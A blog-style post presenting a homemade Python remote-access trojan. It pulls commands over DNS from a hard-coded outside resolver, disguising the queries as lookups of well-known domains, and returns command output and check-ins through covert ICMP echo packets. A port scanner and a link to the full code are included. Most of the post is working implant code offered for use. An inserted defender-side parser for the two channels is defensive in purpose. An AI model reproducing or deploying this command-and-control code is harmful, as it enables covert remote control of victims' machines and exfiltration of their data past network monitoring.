Homemade RAT: DNS + ICMP communication

I saw a job posting in a Python group: a course project for a computer networking class that required writing a Python program related to network security. I happened to be planning to write a remote-control tool (RAT) anyway, so I took it on.
It uses two protocols, ICMP and DNS, to improve stealth, which also happens to match what the networking course covers: DNS carries the commands, while ICMP is used to report check-ins (coming online) and to return command output. There are no advanced algorithms or data structures, just basic pieces glued together... and since it was written on Linux, moving it to Windows brings a lot of compatibility problems... anyone interested can tweak it a bit.
Only the key code is recorded below; the full code can be found on my GitHub:
https://github.com/hausa-han/easy_remote_control/

ICMP server:

import socket
import struct

# Raw ICMP socket; opening it requires root (CAP_NET_RAW) on Linux.
rawsocket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
rawsocket.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
cmdresult = []   # command output reported by the client; filled in by code not shown here
while True:
    pkt = rawsocket.recvfrom(4096)
    # recvfrom() returns the whole IP datagram; the text field is the last 48 bytes of it
    message = pkt[0].decode("utf-8", "ignore")[-48:]
    ip = pkt[1][0]   # source address of the client that checked in

Sending ICMP packets:

import socket
import struct
from re import findall

def send_packet(ip, key, message):
    # Echo request (type 8, code 0), id 1, seq 0; struct pads or truncates the
    # message to the 48-byte text field. `key` is unused here (it belongs to the
    # encryption step in the full code).
    rawsocket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname("icmp"))
    packet = struct.pack('!BBHHH48s', 8, 0, 0, 1, 0, message.encode('utf-8'))
    chksum = checksum(packet)   # standard RFC 1071 Internet checksum; assumed to be defined in the full code (not shown)
    packet = struct.pack('!BBHHH48s', 8, 0, chksum, 1, 0, message.encode('utf-8'))
    rawsocket.sendto(packet, (ip, 0))

def cutmessage(text, length):
    # Split `text` into pieces of `length` characters; the final (possibly empty) piece
    # gets a trailing "@" so the receiver knows the message is complete.
    # Note that '.' does not match newlines, so multi-line output is not split as intended.
    result = findall('.{' + str(length) + '}', text)
    result.append(text[len(result) * length:])
    result[-1] = result[-1] + "@"
    return result

DNS query:

import dns.exception
import dns.resolver
from time import sleep

sleep_time = 5   # polling interval in seconds; the real value is set elsewhere in the full code

def get_command():
    a = dns.resolver.Resolver()
    a.nameservers = ["175.24.9.38"]   # the controller's resolver from the post
    a.port = 10086
    servers = ["www.api.baidu.com", "www.zoom.google.vip", "api.pan.baidu.com", "zz.github.org", "video.blowtoheaven.onion"]
    while True:
        cmd = ""
        dnsresult = ""   # reset each round; the original kept appending across rounds
        try:
            for n in range(0, 5):
                sleep(sleep_time)
                if servers[n][-1:] == ".":
                    servers[n] = servers[n][:-1]
                an = a.query(servers[n])   # query() is deprecated in dnspython 2.x in favour of resolve()
                for i in an.response.answer:
                    for s in i.items:
                        # each A record's four octets carry character codes, joined with "."
                        dnsresult = dnsresult + str(s) + "."
        except dns.exception.DNSException:
            continue
        # Decode the octets back into characters; the octet "7" marks the end of the command
        for i in dnsresult.split("."):
            if i == "7" or i == "":
                break
            cmd = cmd + chr(int(i))
        return cmd   # the full code goes on to execute cmd and report the output over ICMP
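Added example, not code from the post or its repository: a small defender-side parser for the two channels described above. It recovers the 48-byte text field from ICMP echo requests in the layout send_packet() packs, reassembles the "@"-terminated pieces produced by cutmessage(), and decodes the A-record octet encoding the DNS loop reads. The IPv4 header, addresses and payloads in SAMPLE are constructed for the test, not captured traffic.

```python
import struct
# Layout the post's sender packs: type, code, checksum, id, seq, 48-byte text field.
ICMP_FMT = "!BBHHH48s"
ICMP_LEN = struct.calcsize(ICMP_FMT)  # 56 bytes

def extract_text(ip_packet):
    """Text field of an echo request in the post's layout, else None (wrong type/size or non-printable)."""
    ihl = (ip_packet[0] & 0x0F) * 4  # IPv4 header length from the IHL nibble
    icmp = ip_packet[ihl:]
    if len(icmp) != ICMP_LEN:
        return None
    itype, code, _chk, _ident, _seq, body = struct.unpack(ICMP_FMT, icmp)
    if itype != 8 or code != 0:
        return None
    text = body.rstrip(b"\x00").decode("utf-8", "ignore")
    return text if text and all(32 <= ord(c) < 127 for c in text) else None

def reassemble(packets):
    """Rebuild messages split by the post's cutmessage(): fixed-size pieces per source,
    the last one marked with a trailing '@'. Takes (src_ip, raw IPv4 packet) pairs."""
    partial, messages = {}, []
    for src, pkt in packets:
        text = extract_text(pkt)
        if text is None:
            continue
        buf = partial.pop(src, "") + text
        if buf.endswith("@"):
            messages.append((src, buf[:-1]))
        else:
            partial[src] = buf
    return messages

def decode_dns_command(answers):
    """Inverse of the post's DNS loop: each A-record octet is a character code, '7' ends the command."""
    cmd = ""
    for octet in ".".join(answers).split("."):
        if octet == "7":
            break
        cmd += chr(int(octet))
    return cmd

# Constructed sample traffic (not a capture): minimal IPv4 header (IHL=5) in front of the
# ICMP part; the ICMP checksum is left at 0 because this detector does not validate it.
def _sample(text):
    return bytes([0x45]) + b"\x00" * 19 + struct.pack(ICMP_FMT, 8, 0, 0, 1, 0, text.encode())

SAMPLE = [("10.0.0.5", _sample("uid=1000(user) gid=1000(user) groups=1000(user")),
          ("10.0.0.5", _sample(")@")),
          ("10.0.0.9", _sample(""))]  # empty payload from an ordinary host: ignored
```

Feeding the per-source stream into reassemble() yields complete messages only once the "@" piece arrives, so a sensor can alert on the rebuilt text rather than on individual 56-byte pings.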

Port scanning:

import socket

def scan(ip, key, target):
    # `ip` and `key` are unused here; they are passed along to the ICMP reply in the full code.
    result = []
    portlist = [7,9,13,21,22,25,37,53,79,80,88,106,110,113,119,135,139,143,179,199,389,427,443,445,465,513,514,543,548,554,587,631,646,873,990,993,995,1025,1026,1027,1028,1110,1433,1720,1723,1755,1900,2000,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000,6646,7070,8000,8008,8080,8443,8888,9100,9999,32768,49152,49153,49154,49155,49156]
    for port in portlist:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(1)
        try:
            # connect_ex() returns 0 when the TCP connect succeeds, otherwise an errno
            if s.connect_ex((target, port)) == 0:
                result.append(str(port))
                print(port)
        except Exception:
            pass
        finally:
            s.close()
    # One open port per line; mode "w" truncates, so a single open is enough
    with open("temp.txt", "w") as f:
        for i in result:
            f.write(i + "\n")

That's all; hope it's of some use.